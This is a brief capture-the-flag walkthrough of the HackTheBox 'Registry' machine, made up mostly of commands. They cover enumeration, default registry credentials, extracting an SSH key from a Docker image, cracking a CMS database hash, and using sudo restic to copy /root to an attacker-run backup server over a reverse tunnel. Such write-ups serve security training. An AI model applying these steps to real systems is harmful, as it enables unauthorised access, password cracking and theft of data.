Registry — HackTheBox

About this box:

Recon:

https://gist.github.com/ls4cfk/b3757e015c520b98f49bbf9555cdaea7#file-nmap-txt
sudo vim /etc/hosts

Enumeration

$ gobuster dir -u http://10.10.10.159/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o ip-enum -t 20
$ gobuster dir -u http://docker.registry.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o vhost-enum -t 20
docker.registry.htb/v2
admin:admin
Docker installation
$ curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
$ echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
$ sudo apt-get update
$ sudo apt-get install docker-ce
{
"insecure-registries":["docker.registry.htb:443"]
}
sudo docker login docker.registry.htb:443
sudo docker pull docker.registry.htb:443/bolt-image:latest
sudo docker run -it docker.registry.htb:443/bolt-image:latest

Get the user

GkOcz221Ftb3ugog
$ chmod 600 id_rsa
$ ssh -i id_rsa bolt@10.10.10.159

Get www-data user

/var/www/html/bolt/app/database
$ scp -i id_rsa bolt@10.10.10.159:/var/www/html/bolt/app/database/bolt.db ./
$ john --wordlist=/usr/share/wordlists/rockyou.txt bolt_db_hash

Get www-data shell

sudo apt install restic
restic init --repo /tmp/registry_bak
rest-server --path /tmp/registry_bak --no-auth --listen 0.0.0.0:8002
ssh -i id_rsa -R 8002:127.0.0.1:8002 bolt@10.10.10.159
$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8002/ /root/ -p pass
$ restic -r /tmp/registry_bak/ restore latest --target ./registry_restored
https://www.hackthebox.eu/profile/94787
